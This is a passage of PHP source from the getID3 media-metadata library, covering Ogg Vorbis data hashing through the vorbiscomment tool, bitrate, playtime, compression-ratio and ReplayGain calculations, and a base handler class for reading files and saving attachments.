'sha1': break; default: return $this->error('bad algorithm "'.$algorithm.'" in getHashdata()'); break; } if (!empty($this->info['fileformat']) && !empty($this->info['dataformat']) && ($this->info['fileformat'] == 'ogg') && ($this->info['audio']['dataformat'] == 'vorbis')) { // We cannot get an identical md5_data value for Ogg files where the comments // span more than 1 Ogg page (compared to the same audio data with smaller // comments) using the normal getID3() method of MD5'ing the data between the // end of the comments and the end of the file (minus any trailing tags), // because the page sequence numbers of the pages that the audio data is on // do not match. Under normal circumstances, where comments are smaller than // the nominal 4-8kB page size, then this is not a problem, but if there are // very large comments, the only way around it is to strip off the comment // tags with vorbiscomment and MD5 that file. // This procedure must be applied to ALL Ogg files, not just the ones with // comments larger than 1 page, because the below method simply MD5's the // whole file with the comments stripped, not just the portion after the // comments block (which is the standard getID3() method. // The above-mentioned problem of comments spanning multiple pages and changing // page sequence numbers likely happens for OggSpeex and OggFLAC as well, but // currently vorbiscomment only works on OggVorbis files. if (preg_match('#(1|ON)#i', ini_get('safe_mode'))) { $this->warning('Failed making system call to vorbiscomment.exe - '.$algorithm.'_data is incorrect - error returned: PHP running in Safe Mode (backtick operator not available)'); $this->info[$algorithm.'_data'] = false; } else { // Prevent user from aborting script $old_abort = ignore_user_abort(true); // Create empty file $empty = tempnam(GETID3_TEMP_DIR, 'getID3'); touch($empty); // Use vorbiscomment to make temp file without comments $temp = tempnam(GETID3_TEMP_DIR, 'getID3'); $file = $this->info['filenamepath']; if (GETID3_OS_ISWINDOWS) { if (file_exists(GETID3_HELPERAPPSDIR.'vorbiscomment.exe')) { $commandline = '"'.GETID3_HELPERAPPSDIR.'vorbiscomment.exe" -w -c "'.$empty.'" "'.$file.'" "'.$temp.'"'; $VorbisCommentError = `$commandline`; } else { $VorbisCommentError = 'vorbiscomment.exe not found in '.GETID3_HELPERAPPSDIR; } } else { $commandline = 'vorbiscomment -w -c "'.$empty.'" "'.$file.'" "'.$temp.'" 2>&1'; $commandline = 'vorbiscomment -w -c '.escapeshellarg($empty).' '.escapeshellarg($file).' '.escapeshellarg($temp).' 2>&1'; $VorbisCommentError = `$commandline`; } if (!empty($VorbisCommentError)) { $this->info['warning'][] = 'Failed making system call to vorbiscomment(.exe) - '.$algorithm.'_data will be incorrect. If vorbiscomment is unavailable, please download from http://www.vorbis.com/download.psp and put in the getID3() directory. Error returned: '.$VorbisCommentError; $this->info[$algorithm.'_data'] = false; } else { // Get hash of newly created file switch ($algorithm) { case 'md5': $this->info[$algorithm.'_data'] = md5_file($temp); break; case 'sha1': $this->info[$algorithm.'_data'] = sha1_file($temp); break; } } // Clean up unlink($empty); unlink($temp); // Reset abort setting ignore_user_abort($old_abort); } } else { if (!empty($this->info['avdataoffset']) || (isset($this->info['avdataend']) && ($this->info['avdataend'] < $this->info['filesize']))) { // get hash from part of file $this->info[$algorithm.'_data'] = getid3_lib::hash_data($this->info['filenamepath'], $this->info['avdataoffset'], $this->info['avdataend'], $algorithm); } else { // get hash from whole file switch ($algorithm) { case 'md5': $this->info[$algorithm.'_data'] = md5_file($this->info['filenamepath']); break; case 'sha1': $this->info[$algorithm.'_data'] = sha1_file($this->info['filenamepath']); break; } } } return true; } public function ChannelsBitratePlaytimeCalculations() { // set channelmode on audio if (!empty($this->info['audio']['channelmode']) || !isset($this->info['audio']['channels'])) { // ignore } elseif ($this->info['audio']['channels'] == 1) { $this->info['audio']['channelmode'] = 'mono'; } elseif ($this->info['audio']['channels'] == 2) { $this->info['audio']['channelmode'] = 'stereo'; } // Calculate combined bitrate - audio + video $CombinedBitrate = 0; $CombinedBitrate += (isset($this->info['audio']['bitrate']) ? $this->info['audio']['bitrate'] : 0); $CombinedBitrate += (isset($this->info['video']['bitrate']) ? $this->info['video']['bitrate'] : 0); if (($CombinedBitrate > 0) && empty($this->info['bitrate'])) { $this->info['bitrate'] = $CombinedBitrate; } //if ((isset($this->info['video']) && !isset($this->info['video']['bitrate'])) || (isset($this->info['audio']) && !isset($this->info['audio']['bitrate']))) { // // for example, VBR MPEG video files cannot determine video bitrate: // // should not set overall bitrate and playtime from audio bitrate only // unset($this->info['bitrate']); //} // video bitrate undetermined, but calculable if (isset($this->info['video']['dataformat']) && $this->info['video']['dataformat'] && (!isset($this->info['video']['bitrate']) || ($this->info['video']['bitrate'] == 0))) { // if video bitrate not set if (isset($this->info['audio']['bitrate']) && ($this->info['audio']['bitrate'] > 0) && ($this->info['audio']['bitrate'] == $this->info['bitrate'])) { // AND if audio bitrate is set to same as overall bitrate if (isset($this->info['playtime_seconds']) && ($this->info['playtime_seconds'] > 0)) { // AND if playtime is set if (isset($this->info['avdataend']) && isset($this->info['avdataoffset'])) { // AND if AV data offset start/end is known // THEN we can calculate the video bitrate $this->info['bitrate'] = round((($this->info['avdataend'] - $this->info['avdataoffset']) * 8) / $this->info['playtime_seconds']); $this->info['video']['bitrate'] = $this->info['bitrate'] - $this->info['audio']['bitrate']; } } } } if ((!isset($this->info['playtime_seconds']) || ($this->info['playtime_seconds'] <= 0)) && !empty($this->info['bitrate'])) { $this->info['playtime_seconds'] = (($this->info['avdataend'] - $this->info['avdataoffset']) * 8) / $this->info['bitrate']; } if (!isset($this->info['bitrate']) && !empty($this->info['playtime_seconds'])) { $this->info['bitrate'] = (($this->info['avdataend'] - $this->info['avdataoffset']) * 8) / $this->info['playtime_seconds']; } if (isset($this->info['bitrate']) && empty($this->info['audio']['bitrate']) && empty($this->info['video']['bitrate'])) { if (isset($this->info['audio']['dataformat']) && empty($this->info['video']['resolution_x'])) { // audio only $this->info['audio']['bitrate'] = $this->info['bitrate']; } elseif (isset($this->info['video']['resolution_x']) && empty($this->info['audio']['dataformat'])) { // video only $this->info['video']['bitrate'] = $this->info['bitrate']; } } // Set playtime string if (!empty($this->info['playtime_seconds']) && empty($this->info['playtime_string'])) { $this->info['playtime_string'] = getid3_lib::PlaytimeString($this->info['playtime_seconds']); } } public function CalculateCompressionRatioVideo() { if (empty($this->info['video'])) { return false; } if (empty($this->info['video']['resolution_x']) || empty($this->info['video']['resolution_y'])) { return false; } if (empty($this->info['video']['bits_per_sample'])) { return false; } switch ($this->info['video']['dataformat']) { case 'bmp': case 'gif': case 'jpeg': case 'jpg': case 'png': case 'tiff': $FrameRate = 1; $PlaytimeSeconds = 1; $BitrateCompressed = $this->info['filesize'] * 8; break; default: if (!empty($this->info['video']['frame_rate'])) { $FrameRate = $this->info['video']['frame_rate']; } else { return false; } if (!empty($this->info['playtime_seconds'])) { $PlaytimeSeconds = $this->info['playtime_seconds']; } else { return false; } if (!empty($this->info['video']['bitrate'])) { $BitrateCompressed = $this->info['video']['bitrate']; } else { return false; } break; } $BitrateUncompressed = $this->info['video']['resolution_x'] * $this->info['video']['resolution_y'] * $this->info['video']['bits_per_sample'] * $FrameRate; $this->info['video']['compression_ratio'] = $BitrateCompressed / $BitrateUncompressed; return true; } public function CalculateCompressionRatioAudio() { if (empty($this->info['audio']['bitrate']) || empty($this->info['audio']['channels']) || empty($this->info['audio']['sample_rate']) || !is_numeric($this->info['audio']['sample_rate'])) { return false; } $this->info['audio']['compression_ratio'] = $this->info['audio']['bitrate'] / ($this->info['audio']['channels'] * $this->info['audio']['sample_rate'] * (!empty($this->info['audio']['bits_per_sample']) ? $this->info['audio']['bits_per_sample'] : 16)); if (!empty($this->info['audio']['streams'])) { foreach ($this->info['audio']['streams'] as $streamnumber => $streamdata) { if (!empty($streamdata['bitrate']) && !empty($streamdata['channels']) && !empty($streamdata['sample_rate'])) { $this->info['audio']['streams'][$streamnumber]['compression_ratio'] = $streamdata['bitrate'] / ($streamdata['channels'] * $streamdata['sample_rate'] * (!empty($streamdata['bits_per_sample']) ? $streamdata['bits_per_sample'] : 16)); } } } return true; } public function CalculateReplayGain() { if (isset($this->info['replay_gain'])) { if (!isset($this->info['replay_gain']['reference_volume'])) { $this->info['replay_gain']['reference_volume'] = (double) 89.0; } if (isset($this->info['replay_gain']['track']['adjustment'])) { $this->info['replay_gain']['track']['volume'] = $this->info['replay_gain']['reference_volume'] - $this->info['replay_gain']['track']['adjustment']; } if (isset($this->info['replay_gain']['album']['adjustment'])) { $this->info['replay_gain']['album']['volume'] = $this->info['replay_gain']['reference_volume'] - $this->info['replay_gain']['album']['adjustment']; } if (isset($this->info['replay_gain']['track']['peak'])) { $this->info['replay_gain']['track']['max_noclip_gain'] = 0 - getid3_lib::RGADamplitude2dB($this->info['replay_gain']['track']['peak']); } if (isset($this->info['replay_gain']['album']['peak'])) { $this->info['replay_gain']['album']['max_noclip_gain'] = 0 - getid3_lib::RGADamplitude2dB($this->info['replay_gain']['album']['peak']); } } return true; } public function ProcessAudioStreams() { if (!empty($this->info['audio']['bitrate']) || !empty($this->info['audio']['channels']) || !empty($this->info['audio']['sample_rate'])) { if (!isset($this->info['audio']['streams'])) { foreach ($this->info['audio'] as $key => $value) { if ($key != 'streams') { $this->info['audio']['streams'][0][$key] = $value; } } } } return true; } public function getid3_tempnam() { return tempnam($this->tempdir, 'gI3'); } public function include_module($name) { //if (!file_exists($this->include_path.'module.'.$name.'.php')) { if (!file_exists(GETID3_INCLUDEPATH.'module.'.$name.'.php')) { throw new getid3_exception('Required module.'.$name.'.php is missing.'); } include_once(GETID3_INCLUDEPATH.'module.'.$name.'.php'); return true; } } abstract class getid3_handler { /** * @var getID3 */ protected $getid3; // pointer protected $data_string_flag = false; // analyzing filepointer or string protected $data_string = ''; // string to analyze protected $data_string_position = 0; // seek position in string protected $data_string_length = 0; // string length private $dependency_to = null; public function __construct(getID3 $getid3, $call_module=null) { $this->getid3 = $getid3; if ($call_module) { $this->dependency_to = str_replace('getid3_', '', $call_module); } } // Analyze from file pointer abstract public function Analyze(); // Analyze from string instead public function AnalyzeString($string) { // Enter string mode $this->setStringMode($string); // Save info $saved_avdataoffset = $this->getid3->info['avdataoffset']; $saved_avdataend = $this->getid3->info['avdataend']; $saved_filesize = (isset($this->getid3->info['filesize']) ? $this->getid3->info['filesize'] : null); // may be not set if called as dependency without openfile() call // Reset some info $this->getid3->info['avdataoffset'] = 0; $this->getid3->info['avdataend'] = $this->getid3->info['filesize'] = $this->data_string_length; // Analyze $this->Analyze(); // Restore some info $this->getid3->info['avdataoffset'] = $saved_avdataoffset; $this->getid3->info['avdataend'] = $saved_avdataend; $this->getid3->info['filesize'] = $saved_filesize; // Exit string mode $this->data_string_flag = false; } public function setStringMode($string) { $this->data_string_flag = true; $this->data_string = $string; $this->data_string_length = strlen($string); } protected function ftell() { if ($this->data_string_flag) { return $this->data_string_position; } return ftell($this->getid3->fp); } protected function fread($bytes) { if ($this->data_string_flag) { $this->data_string_position += $bytes; return substr($this->data_string, $this->data_string_position - $bytes, $bytes); } $pos = $this->ftell() + $bytes; if (!getid3_lib::intValueSupported($pos)) { throw new getid3_exception('cannot fread('.$bytes.' from '.$this->ftell().') because beyond PHP filesystem limit', 10); } return fread($this->getid3->fp, $bytes); } protected function fseek($bytes, $whence=SEEK_SET) { if ($this->data_string_flag) { switch ($whence) { case SEEK_SET: $this->data_string_position = $bytes; break; case SEEK_CUR: $this->data_string_position += $bytes; break; case SEEK_END: $this->data_string_position = $this->data_string_length + $bytes; break; } return 0; } else { $pos = $bytes; if ($whence == SEEK_CUR) { $pos = $this->ftell() + $bytes; } elseif ($whence == SEEK_END) { $pos = $this->getid3->info['filesize'] + $bytes; } if (!getid3_lib::intValueSupported($pos)) { throw new getid3_exception('cannot fseek('.$pos.') because beyond PHP filesystem limit', 10); } } return fseek($this->getid3->fp, $bytes, $whence); } protected function feof() { if ($this->data_string_flag) { return $this->data_string_position >= $this->data_string_length; } return feof($this->getid3->fp); } final protected function isDependencyFor($module) { return $this->dependency_to == $module; } protected function error($text) { $this->getid3->info['error'][] = $text; return false; } protected function warning($text) { return $this->getid3->warning($text); } protected function notice($text) { // does nothing for now } public function saveAttachment($name, $offset, $length, $image_mime=null) { try { // do not extract at all if ($this->getid3->option_save_attachments === getID3::ATTACHMENTS_NONE) { $attachment = null; // do not set any // extract to return array } elseif ($this->getid3->option_save_attachments === getID3::ATTACHMENTS_INLINE) { $this->fseek($offset); $attachment = $this->fread($length); // get whole data in one pass, till it is anyway stored in memory if ($attachment === false || strlen($attachment) != $length) { throw new Exception('failed to read attachment data'); } // assume directory path is given } else { // set up destination path $dir = rtrim(str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $this->getid3->option_save_attachments), DIRECTORY_SEPARATOR); if (!is_dir($dir) || !is_writable($dir)) { // check supplied directory throw new Exception('supplied path ('.$dir.') does not exist, or is not writable'); } $dest = $dir.DIRECTORY_SEPARATOR.$name.($image_mime ? '.'.getid3_lib::ImageExtFromMime($image_mime) : ''); // create dest file if (($fp_dest = fopen($dest, 'wb')) == false) { throw new Exception('failed to create file '.$dest); } // copy data $this->fseek($offset); $buffersize = ($this->data_string_flag ? $length : $this->getid3->fread_buffer_size()); $bytesleft = $length; while ($bytesleft > 0) { if (($buffer = $this->fread(min($buffersize, $bytesleft))) === false || ($byteswritten = fwrite($fp_dest, $buffer)) === false || ($byteswritten === 0)) { throw new Exception($buffer === false ? 'not enough data to read' : 'failed to write to destination file, may be not enough disk space'); } $bytesleft -= $byteswritten; } fclose($fp_dest); $attachment = $dest; } } catch (Exception $e) { // close and remove dest file if created if (isset($fp_dest) && is_resource($fp_dest)) { fclose($fp_dest); unlink($dest); } // do not set any is case of error $attachment = null; $this->warning('Failed to extract attachment '.$name.': '.$e->getMessage()); } // seek to the end of attachment $this->fseek($offset + $length); return $attachment; } } class getid3_exception extends Exception { public $message; }